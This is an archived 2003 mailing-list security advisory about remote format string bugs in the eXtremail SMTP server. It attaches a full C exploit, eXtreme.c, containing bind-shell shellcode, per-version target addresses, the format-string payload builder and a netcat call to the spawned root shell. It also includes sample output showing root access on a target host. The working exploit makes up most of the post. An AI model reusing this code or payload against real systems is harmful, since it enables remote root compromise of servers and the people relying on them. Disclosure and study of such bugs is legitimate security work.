lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.BSO.4.53.0307020036310.8662@silvia.blueyonder.co.uk>
From: br00t at blueyonder.co.uk (B-r00t)
Subject: extremail (latest) fmt strings

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1





Remote Vulnerabilities in eXtremail Server.
===========================================

Date:           02.07.2003
Email:          B-r00t <br00t@...eyonder.co.uk>

Reference:      http://www.extremail.com/
Versions:       Linux eXtremail-1.5-8 => VULNERABLE
                Linux eXtremail-1.5-5 => VULNERABLE

Exploit:        eXtreme.c

eXtreme is a Unix mailserver, providing SMTP (port25), POP3 (port 110)
and IMAP(port 143) services. The latest versions of which are still
vulnerable to Format Strings vulnerabilities as discovered previously.

http://www.securityfocus.com/bid/2908/info/

eXtremail contains a format string vulnerability in it's logging
mechanism. It is possible for users to send SMTP commands argumented with
maliciously constructed arguments that will exploit this vulnerability.

eXtremail runs with root privileges. By exploiting this vulnerability,
remote attackers can gain superuser access on the underlying host. It is
also possible to crash eXtremail. If it is not restarted automatically, a
denial of SMTP service will result.

These vulnerabilities were apparently fixed in version 'eXtremail 1.1.10',
however they seem to have emerged in the latest versions.

Attached exploit [eXtreme.c] for latest versions of eXtremail.

$ gcc -o eXtreme eXtreme.c

$ ./eXtreme

eXtreme by B-r00t <br00t@...eyonder.co.uk>. (c) 2003

Usage: eXtreme [IP_ADDRESS] [TARGET]
Example: eXtreme 10.0.0.1 2

0       RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)
1       Linux ANY  eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)
2       Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)
3       eXtremail V1.5 DEBUG

On success a r00tshell will be spawned on port 36864.






 $ ./eXtreme 192.168.0.50 2

eXtreme by B-r00t <br00t@...eyonder.co.uk>. (c) 2003

Connected to 192.168.0.50
Recv:   220 localdomain eXtremail V1.5 release 7 ESMTP server ready ...
Send:   HELO Br00t~R0x~Y3r~W0rld!
Recv:   250 Hi, I am localdomain

System type:            Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)
Write Addy:             0xbefff0c8
RET (shellcode):        0xbefff1d4
PAD (alignment):        1
Payload:                254 / 266 max bytes
Sending it ...
Send:   mail from: a%.176u%44$n%.29u%45$n%.14u%46$n%.191u%47$nn^)       F@
F@      /bin/shCf       Vf      VfC?)?A?AV      v
Using netcat 'nc' to get the r00tshell on port 36864 ....!!!!!

Connection to 192.168.0.50 36864 port [tcp/*] succeeded!
id; uname -a;
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
Linux RedHat-9-0 2.4.20-8 #1 Thu Mar 13 16:42:56 EST 2003 i586 i586 i386
GNU/Linux



- -- 

B#.
- ----------------------------------------------------
Email : B-r00t <br00t@...eyonder.co.uk>
Key fingerprint = 74F0 6A06 3E57 083A 4C9B
		  ED33 AD56 9E97 7101 5462
"You Would Be Paranoid If They Were Watching You !!!"
- -----------------------------------------------------







-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (OpenBSD)

iD8DBQE/AinzrVael3EBVGIRAsLuAKCsxZMHymL1Y4MUQIFsW2krGruKpQCgtd5U
DhKmHlOYbfVm0YC0QuLOApY=
=UtZ9
-----END PGP SIGNATURE-----
-------------- next part --------------
/* 	Remote Format Strings Exploit for eXtremail latest versions. 	*/
/* 	============================================================ 	*/
/*									*/
/*      	        By B-r00t <br00t@...eyonder.co.uk>       	*/         
/*                                                           		*/
/*	Date:		02/07/2003					*/
/*	Reference:      http://www.extremail.com/			*/
/*	Versions:       Linux eXtremail-1.5-8 => VULNERABLE		*/
/*			Linux eXtremail-1.5-5 => VULNERABLE		*/			
/*									*/
/*	Exploit: eXtreme.c						*/
/* 	Compile: gcc -o eXtreme eXtreme.c				*/
/*									*/
/*	Exploit uses format strings bug in fLog() of smtpd to bind a 	*/
/*	r00tshell to port 36864 on the target eXtremail server.		*/
/*									*/
/*	Methods of exploitation.					*/
/*	------------------------					*/
/* 	eXtremail-1.5-5.i686.rpm use format strings bug to overwrite	*/
/*	GOT of fflush() to point to shellcode.				*/
/*									*/
/*	eXtremail-1.5-8.i586.rpm is a static binary so its not		*/
/*	possible to abuse GOT. Saved RET address is overwritten		*/
/*	to point to shellcode.						*/
/*									*/
/*	New Releases with old bugs? => FIX IT!				*/
/*									*/
/*	THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!			*/
/*									*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

#define EXPLOIT "eXtreme"
#define DEST_PORT 25

// Prototypes
int get_sock (char *host);
int send_sock (char *stuff);
int read_sock (void);
void usage (void);
int do_it (void);

// Globals
int socketfd, choice;
unsigned long GOT, RET;
char *myip;
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";
char shellcode[] = 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";


struct {
        char *systemtype;
        unsigned long got;
        unsigned long ret;
        int pad;
        int buf;
        int pos;
} targets[] = {
	// Confirmed targets tested by B-r00t.
        { "RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)",   0x0813b19c, 0xbefff1e8, 1, 266, 44},
        { "Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)",   0x0813b19c, 0xbefff1b8, 1, 266, 44},
	{ "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)",   0xbefff0c8, 0xbefff1d4, 1, 266, 44},
        { "eXtremail V1.5 DEBUG",   0x44434241, 0xaaaaaaaa, 1, 266, 44},
        { 0 } 
	};

int main ( int argc, char *argv[] )
{
char *TARGET = "TARGET";

printf ("\n%s by B-r00t <br00t@...eyonder.co.uk>. (c) 2003\n", EXPLOIT);

if (argc < 3) 
usage ();

choice = atoi(argv[2]);
if (choice < 0 || choice > 3) 
usage ();

setenv (TARGET, argv[1], 1);

get_sock(argv[1]);
sleep (1);
read_sock ();
sleep (1);
send_sock (helo);
sleep (1);
read_sock ();
sleep(1);
do_it ();
}


void usage (void)
{
        int loop;
	printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
        printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
	for (loop = 0; targets[loop].systemtype; loop++)
			printf ("\n%d\t%s", loop, targets[loop].systemtype);
        printf ("\n\nOn success a r00tshell will be spawned on port 36864.\n\n");
	exit (-1);
        }


int get_sock (char *host) 
{
struct sockaddr_in dest_addr;

if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("Socket Error!\n");
        exit (-1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(host, &(dest_addr.sin_addr))) {
        perror("inet_aton problems\n");
        exit (-2);
        }

memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
        perror("Connect failed!\n");
        close (socketfd);
        exit (-3);
        }
printf ("\n\nConnected to %s\n", host);
}



int send_sock (char *stuff) 
{
	int bytes;
        bytes = (send (socketfd, stuff, strlen(stuff), 0));
        if (bytes == -1) {
        perror("Send error");
        close (socketfd);
        exit(4);
	}
printf ("Send:\t%s", stuff);
return bytes;
}


int read_sock (void) 
{
        int bytes;
	char buffer[200];
	char *ptr;
	ptr = buffer;
	memset (buffer, '\0', sizeof(buffer));
        bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
        if (bytes == -1) {
        perror("send error");
        close (socketfd);
        exit(4);
	}
printf ("Recv:\t%s", buffer);
return bytes;
}


int do_it (void)
{
char format[200], buf[500], *bufptr, *p;
int loop, sofar = 0;
int PAD = targets[choice].pad;
int POS = targets[choice].pos;
unsigned char r[3], g[3], w[3];

RET = targets[choice].ret;
r[0] = (int) (RET & 0x000000ff);
r[1] = (int)((RET & 0x0000ff00) >> 8);
r[2] = (int)((RET & 0x00ff0000) >> 16);
r[3] = (int)((RET & 0xff000000) >> 24);

GOT = targets[choice].got;
g[0] = (int) (GOT & 0x000000ff);
g[1] = (int)((GOT & 0x0000ff00) >> 8);
g[2] = (int)((GOT & 0x00ff0000) >> 16);
g[3] = (int)((GOT & 0xff000000) >> 24);


// Start buf
bufptr = buf;
bzero (bufptr, sizeof(buf));
strncpy (buf, "mail from: ", strlen("mail from: "));
sofar = 19;

// Do padding
for (loop=0; loop<PAD; loop++)
strncat (buf, "a", 1);
sofar = sofar+PAD;

//1st GOT addy
strncat (buf, g, 4);

//2nd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);

// 3rd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);

// 4th GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
sofar = sofar+16;

for (loop=0; loop<4; loop++) {
				if (r[loop] > sofar) {
							w[loop] = r[loop]-sofar;
							} else
				if (r[loop] == sofar) {
							w[loop] = 0;
							}else
				if (r[loop] < sofar) {
							w[loop] = (256-sofar)+r[loop];
							}
				sofar = sofar+w[loop];
				}

bufptr = format;
bzero (bufptr, sizeof(format));
sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n", w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
strncat (buf, format, sizeof(format));
strncat (buf, shellcode, sizeof(shellcode));

// Summarise
printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
printf ("\nWrite Addy:\t\t0x%x", GOT);
printf ("\nRET (shellcode):\t0x%x", RET);
printf ("\nPAD (alignment):\t%d", PAD);
printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf), targets[choice].buf);
printf ("\nSending it ... \n");
sleep(1);

// Ok lets Wack it!
send_sock (buf);
sleep (1);
close (socketfd);
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 ....!!!!!\n\n\n");
sleep(3); // May take time to spawn a shell
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
}

/*	Shoutz: Marshal-l, Rux0r, blunt, macavity, Monkfish		*/
/*              Rewd, Maz. That One Doris ... U-Know-Who-U-R!           */
/*		The doris.scriptkiddie.net posse.			*/
/*                                                                      */
/*    	B-r00t aka B#. 2003. <br00t@...eyonder.co.uk> (c)               */
/*      "If You Can't B-r00t Then Just B#."                             */
/*                                                                      */
/* 	ENJOY!                                                          */

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ